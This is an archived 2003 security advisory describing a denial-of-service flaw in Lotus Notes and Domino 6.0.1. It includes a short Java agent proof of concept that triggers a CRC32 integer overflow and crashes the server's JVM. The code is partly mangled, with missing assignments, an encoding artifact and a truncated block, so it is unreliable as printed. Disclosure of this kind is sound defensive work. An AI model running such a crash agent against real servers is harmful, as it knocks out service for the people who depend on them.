Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: a6116.htm

Java Agent freezes Lotus Notes and Domino 6.0.1 JAV:
7th Apr 2003 [SBWID-6116]

	Java Agent freezes Lotus Notes and Domino 6.0.1


	 Lotus Notes 6.0.1
	 Lotus Domino 6.0.1


	Marc Schoenefeld [] found following:
	the following agent causes the IBM JVM 1.3.1 shipped with  Lotus  Domino
	6.0.1 and Lotus Notes 6.0.1 to crash. After calling  the  agent  a  huge
	amount of memory is not freed and causes the  server  machine  (observed
	on MS XP) to deny further service.
	 - If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
	 - if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.
	The call to the "update" method of the CRC32 raises an integer  overflow
	in the java* core libraries which triggers a jni  routine
	that cannot handle the extreme high input value.
	This vulnerability has already been detected in the Sun JDK
	and was disclosed at Blackhat Windows 2003.
	The background of this bugs is described at
	import lotus.domino.*;
	public class JavaAgent extends AgentBase {
	  public void NotesMain() {
	    try {
	      Session session getSession();
	      AgentContext agentContext session.getAgentContext();
	      CRC32 crc32 =3D new CRC32();
	      crc32.update(new byte[0], 4, 0x7ffffffc);
	      // (Your code goes here)
	    } catch(Exception e) {


	Don't allow agents on server.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH